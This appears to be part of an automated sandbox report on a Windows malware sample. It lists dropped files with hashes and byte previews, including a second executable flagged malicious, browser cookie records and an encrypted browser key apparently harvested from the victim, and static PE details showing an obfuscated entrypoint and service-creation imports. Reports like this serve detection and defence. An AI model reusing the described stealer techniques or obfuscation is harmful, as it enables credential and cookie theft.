Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.\|...\|...\|...t...\|...p...\|...p...\|...p...\|...p...\|..~t...\|..._...\|...t...\|..~t...\|...\|..6\|..sk...\|..sk...\|...w...\|..sk...\|..Rich.\|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\download_engine.dll Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3512776
Entropy (8bit):	6.514740710935125
Encrypted:	false
SSDEEP:	49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
MD5:	1A87FF238DF9EA26E76B56F34E18402C
SHA1:	2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
SHA-256:	ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
SHA-512:	B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	503808
Entropy (8bit):	6.4043708480235715
Encrypted:	false
SSDEEP:	12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
MD5:	A94DC60A90EFD7A35C36D971E3EE7470
SHA1:	F936F612BC779E4BA067F77514B68C329180A380
SHA-256:	6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
SHA-512:	FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<\|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.56488891304105
Encrypted:	false
SSDEEP:	6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
MD5:	CA2F560921B7B8BE1CF555A5A18D54C3
SHA1:	432DBCF54B6F1142058B413A9D52668A2BDE011D
SHA-256:	C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
SHA-512:	23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.............K.E.........S...F.x.....F......F.G.....F.D.....F.F.....F.B.....Rich............................PE..L....Q.D...........!..............................6\|.........................`......V...............................L....C......(.... .......................0..h+......8...............................H...............l............................text............................... ..`.rdata..`...........................@..@.data....h.......`..................@....rsrc........ ......................@..@.reloc..h+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\zlib1.dll Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	59904
Entropy (8bit):	6.753320551944624
Encrypted:	false
SSDEEP:	1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
MD5:	89F6488524EAA3E5A66C5F34F3B92405
SHA1:	330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
SHA-256:	BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
SHA-512:	CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."u.-f..~f..~f..~c..~e..~c..~g..~c..~c..~c..~d..~...~d..~f..~~..~...~k..~...~d..~...~g..~...~g..~...~g..~Richf..~........................PE..L...%..M...........!.........R....................[!.........................0.........................................].......<............................ ..........................................................h............................text............................... ..`.rdata...F.......H..................@..@.data...t...........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ecv71A3.tmp Download File
Process:	C:\Users\user\AppData\Roaming\1612058829275.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x406b65bd, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	26738688
Entropy (8bit):	1.0149462571367907
Encrypted:	false
SSDEEP:	24576:nCwqTaQxuzQFetaWLSiAWaSoxoyxQgSFDb7uBi:xQFetNSzY
MD5:	411F51FBD3AEB3B57E0800BB616FE20E
SHA1:	F48260535A313A0086845E38240697888A578E87
SHA-256:	7990E93D6FAAE30F1B9AE2204948C7F7257970DC8F6AC3F762B66AC50233F3B5
SHA-512:	4F21F30A4FEAA4B24568EAF5BAB3140DF448E5D4AAC1E195F583146AE530A6FC09FDF16076FDD8DBF9693E0F5965DDFD06FF1DC1EE83DA5217AAC72E8A356B3C
Malicious:	false
Preview:	@ke.... .......50.......te3....wg.......................)..........x/.*....x..h.+.........................6..43....wI.............................................................................................Z............B.................................................................................................................. .......1....yY........................................................................................................................................................................................................................................1....yYi................qn.1....x..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xldl.dat Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	1397922
Entropy (8bit):	7.999863097294012
Encrypted:	true
SSDEEP:	24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
MD5:	18C413810B2AC24D83CD1CDCAF49E5E1
SHA1:	ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
SHA-256:	9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
SHA-512:	FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
Malicious:	false
Preview:	7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.\|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~\|J^.YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....\|..n1...Y.i4\.ZN..V....U)...\|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.

C:\Users\user\AppData\Local\Temp\xldl.dll Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	293320
Entropy (8bit):	6.347427939821131
Encrypted:	false
SSDEEP:	6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
MD5:	208662418974BCA6FAAB5C0CA6F7DEBF
SHA1:	DB216FC36AB02E0B08BF343539793C96BA393CF1
SHA-256:	A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
SHA-512:	8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1612058828915 Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	87165
Entropy (8bit):	6.102565506017432
Encrypted:	false
SSDEEP:	1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
MD5:	CC02ABB348037609ED09EC9157D55234
SHA1:	32411A59960ECF4D7434232194A5B3DB55817647
SHA-256:	62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
SHA-512:	AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Roaming\1612058829072 Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	0.7697933531254957
Encrypted:	false
SSDEEP:	96:NNw4xOoBCJyC2V8MZyFl8AlG4oNFeymw:Nu4xOoBIy7OzlG4oNH
MD5:	10539C93BEF3228B2ED2E8A7A2C02D8A
SHA1:	C293CCAF8EDAFB4C187CFC3C5328DEF1219EBDF5
SHA-256:	107639FDDC1335D086EA380AE405F5C7E83C25B07DD4868BF3E88E2774093722
SHA-512:	79994EAD2E69060E9CE8D4EE288E6FA3C6BC299A42389EB16948CC6D074A2ACEB1B17BE28A4D90A4DA3164B0510F9C525AF47D9AB066D06F2A4D063459589DCF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1612058829275.exe Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	103632
Entropy (8bit):	6.404475911013687
Encrypted:	false
SSDEEP:	1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
MD5:	EF6F72358CB02551CAEBE720FBC55F95
SHA1:	B5EE276E8D479C270ECEB497606BD44EE09FF4B8
SHA-256:	6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
SHA-512:	EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 14%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1612058829275.txt Download File
Process:	C:\Users\user\AppData\Roaming\1612058829275.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	27328
Entropy (8bit):	3.7092890861965286
Encrypted:	false
SSDEEP:	192:b3w/3wBkf3DpvI6PprepmlmE1lVT0oMoSDNlkS1:bqg+flvIKpt3VvODNlkS1
MD5:	3B1D8E74CDD69F7D029CE5ACCEE73714
SHA1:	BF71F09A81C43BB15E7CBFF694C5063B91F67DD5
SHA-256:	D25B9068F34D498145CDE1986A84CE5DABFBBA16FDD7FE92CCA2768CAC2F481B
SHA-512:	C2E5FFC9B825E3C39D59D91ADFF16E36EF024BCA0813F1B503DBA6E26A270CBB31AE2309B1ED5F554D8416FEB4A4AA88FC8B78FC8A2E631731F2128066BF9F81
Malicious:	false
Preview:	..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.0.6. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.3.1./.2.0.3.7. .1.0.:.5.9.:.1.4. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".C.O.N.S.E.N.T.".,.....".V.a.l.u.e.".:.".W.P...2.7.b.6.d.e.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".N.o.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".1.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.1.2.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.1.1. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.2.7./.2.0.1.9. .9.:.2.3.:.1.1. .A.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.h.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".N.I.D.".,.....".V.a.l.u.e.".:.".1.8.6.=.f.q.t.N.G.i.j.l.-.o.b.4.K.y.V.I.p.O.b.W.8.G.z.s.h.L.K.8.N.W.5._.R.t.7.6.F.k.H.Q.W.U.N.y.S.-.V.3.z.5.y.T.b.R.q.2.m.w.h.c.z.E.m.a.5.

C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	data
Category:	dropped
Size (bytes):	1404
Entropy (8bit):	7.169231648631483
Encrypted:	false
SSDEEP:	24:ZgGGje/+GNje/+Gd7fiSBSvG/ne102dgmYa43xSnvcSO:ZdAe/+Gpe/+G1fiSsGve1PIaAxSnvc1
MD5:	94F70083532A6F2D5821123CDC96E92A
SHA1:	EB9D68E737EA1DC2DBF1B77970550FA913952914
SHA-256:	291A077B01ABB73B9BB60572BC636753AFE6B91913F48B60EF13972C57D89CC5
SHA-512:	39F8EF2AFF8D58506BDF32DF83FC2ACF3CAC4B01F83283179E501824F1D28DD30D5DD998F41A14D702D7BA32E8B7C2B037B6D61E9AE8F8CCB31EBE39EBA17BAD
Malicious:	false
Preview:	............l......\|......_..'.. .......P...0..L0..4........m.L.b0....H........0..1;09..U...2Charles Proxy CA (19 .. 2019, DESKTOP-BNAT11U)1%0#..U....https://charlesproxy.com/ssl1.0...U....XK72 Ltd1.0...U....Auckland1.0...U....Auckland1.0...U....NZ0...000101000000Z..481215091537Z0..1;09..U...2Charles Proxy CA (19 .. 2019, DESKTOP-BNAT11U)1%0#..U....https://charlesproxy.com/ssl1.0...U....XK72 Ltd1.0...U....Auckland1.0...U....Auckland1.0...U....NZ0.."0....H.............0............>.M..O....@G...3.....d\.$...KI!...j"$\|2..}t*......%..S...#.5=.:....i8&..:T...eSP..X^F}1....1.".x.?.K4.6x-....,."G.NLZ.3.fT#T..q..Y....!.G\|..bN....`#...6.....`F6..v...W.s.2..4.'.B..3.../..T.....\|...,..B.......>?6..$?...@.-nn.!I..4#.....G4%.........t0..p0...U.......0....0..,..`.H...B..........This Root certificate was generated by Charles Proxy for SSL Proxying. If this certificate is part of a certificate chain, this means that you're browsing through Charles Proxy with SSL Proxying enabl

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.6038629847857155
TrID:	Win32 Executable (generic) a (10002005/4) 99.27% InstallShield setup (43055/19) 0.43% Windows Screen Saver (13104/52) 0.13% DOS Executable Borland C++ (13009/5) 0.13% Generic Win/DOS Executable (2004/3) 0.02%
File name:	aOn5CfTiwS.exe
File size:	5007872
MD5:	013eba0050ebe18e39978e89a56c0fab
SHA1:	85ef7c03d70e2cc7095550ce15f140e78d05f3ad
SHA256:	5fa60303a0c4fd13ecd69e7c1a17788b72605473c2fb3f93eb758010326c76e5
SHA512:	159a723e036b86996f715c460756a047436396dc20afd1a62715c734be5ab0fdc6c213fe492201142f695bf33396a49ee34010b3a9c52751b527270a2cd6af05
SSDEEP:	98304:DPWOtJfIskP639K2Bfm873n1ME5IYrS71FARhPF3a7/nzoy4kKnuaHqrTdL:SOtJfIsw63tjuE5IYrS5u7PFKrOHMxL
File Content Preview:	MZP.....................@.............................................j....L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	78dcd8d0a0f81cc6

Static PE Info

General
Entrypoint:	0x4014d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4B0AE27C [Mon Nov 23 19:29:00 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	bc6f6219c69205bfcf9e875060fcd9d1

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub ebp, 18h
mov dword ptr [ebp-14h], 004014D0h
push edx
mov edx, 00000028h
sub edx, 00000000h
add edx, dword ptr [ebp-14h]
push edx
ret
call edi
mov ebx, edx
mov esp, ebp
mov edi, eax
mov ecx, dword ptr [ecx]
pop edx
push 00000003h
push edx
mov edx, 00000047h
sub edx, 00000000h
add edx, dword ptr [ebp-14h]
push edx
ret
mov edx, ebx
mov ebx, ebp
call ebx
mov ebx, dword ptr [esi]
mov ecx, dword ptr [ebp+00h]
pop edx
mov eax, 00401852h
push edx
mov edx, 0000006Bh
sub edx, 00000000h
add edx, dword ptr [ebp-14h]
push edx
ret
mov eax, dword ptr [esi]
mov ebx, esp
mov edi, eax
mov eax, edx
inc ebx
pop ecx
mov ecx, edx
in al, dx
pop edx
push eax
push edx
mov edx, 00000087h
sub edx, 00000000h
add edx, dword ptr [ebp-14h]
push edx
ret
mov edx, ebx
inc eax
mov eax, ebx
mov ebx, esi
mov ecx, dword ptr [ecx]
pop edx
push 000013C5h
push edx
mov edx, 000000A9h
sub edx, 00000000h
add edx, dword ptr [ebp-14h]
push edx
ret
mov esi, ecx
dec ebx
mov ecx, dword ptr [esp]
dec ebx
mov edx, edi
mov edx, dword ptr [esi]
pop edx
push 00402086h
push edx
mov edx, 000000CFh
sub edx, 00000000h
add edx, dword ptr [ebp-14h]
push edx
ret
mov ebp, esi
mov esi, ecx
pop esi
mov eax, dword ptr [esi]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xcd000	0x2ea	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xca000	0x2833	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xce000	0x1a17c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe9000	0xac3c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc9000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb2000	0xb1400	False	0.459549100846	data	6.39323568191	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0xb3000	0x15000	0xce00	False	0.295092536408	data	4.58629878593	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0xc8000	0x1000	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0xc9000	0x1000	0x200	False	0.05078125	data	0.210826267787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.idata	0xca000	0x3000	0x2a00	False	0.315569196429	data	5.11321852276	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.edata	0xcd000	0x1000	0x400	False	0.392578125	data	4.24371374363	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xce000	0x1a17c	0x1a200	False	0.151054126794	data	4.38888183509	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe9000	0xb000	0xae00	False	0.00148168103448	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0xcec40	0x134	data	English	United States
RT_CURSOR	0xced74	0x134	data	English	United States
RT_CURSOR	0xceea8	0x134	data	English	United States
RT_CURSOR	0xcefdc	0x134	data	English	United States
RT_CURSOR	0xcf110	0x134	data	English	United States
RT_CURSOR	0xcf244	0x134	data	English	United States
RT_CURSOR	0xcf378	0x134	data	English	United States
RT_BITMAP	0xcf4ac	0x1d0	data	English	United States
RT_BITMAP	0xcf67c	0x1e4	data	English	United States
RT_BITMAP	0xcf860	0x1d0	data	English	United States
RT_BITMAP	0xcfa30	0x1d0	data	English	United States
RT_BITMAP	0xcfc00	0x1d0	data	English	United States
RT_BITMAP	0xcfdd0	0x1d0	data	English	United States
RT_BITMAP	0xcffa0	0x1d0	data	English	United States
RT_BITMAP	0xd0170	0x1d0	data	English	United States
RT_BITMAP	0xd0340	0x1d0	data	English	United States
RT_BITMAP	0xd0510	0x1d0	data	English	United States
RT_BITMAP	0xd06e0	0xe8	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xd07c8	0x2e8	data	English	United States
RT_DIALOG	0xd0ab0	0x52	data
RT_DIALOG	0xd0b04	0x52	data
RT_STRING	0xd0b58	0x19c	data
RT_STRING	0xd0cf4	0xe0	data
RT_STRING	0xd0dd4	0xbc	data
RT_STRING	0xd0e90	0x368	data
RT_STRING	0xd11f8	0x498	data
RT_STRING	0xd1690	0x330	data
RT_STRING	0xd19c0	0x398	data
RT_STRING	0xd1d58	0x390	data
RT_STRING	0xd20e8	0x428	data
RT_STRING	0xd2510	0x484	data
RT_STRING	0xd2994	0x384	data
RT_STRING	0xd2d18	0x120	data
RT_STRING	0xd2e38	0xec	data
RT_STRING	0xd2f24	0x130	data
RT_STRING	0xd3054	0x414	data
RT_STRING	0xd3468	0x3f8	data
RT_RCDATA	0xd3860	0x10	data
RT_RCDATA	0xd3870	0x2abb	Delphi compiled form 'TAboutBox'
RT_RCDATA	0xd632c	0x10d21	Delphi compiled form 'TfrmMainFormServer'
RT_RCDATA	0xe7050	0x71d	Delphi compiled form 'TfrmServiceInstallParams'
RT_RCDATA	0xe7770	0x494	Delphi compiled form 'TLoginDialog'
RT_GROUP_CURSOR	0xe7c04	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xe7c18	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xe7c2c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xe7c40	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xe7c54	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xe7c68	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xe7c7c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_ICON	0xe7c90	0x14	data	English	United States
RT_VERSION	0xe7ca4	0x2d8	data	English	United States
RT_MANIFEST	0xe7f7c	0x1fe	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
ADVAPI32.DLL	CloseServiceHandle, ControlService, CreateServiceA, OpenSCManagerA, OpenServiceA, QueryServiceStatus, RegCloseKey, RegCreateKeyExA, RegFlushKey, RegOpenKeyExA, RegQueryValueExA, RegSetValueExA, StartServiceA
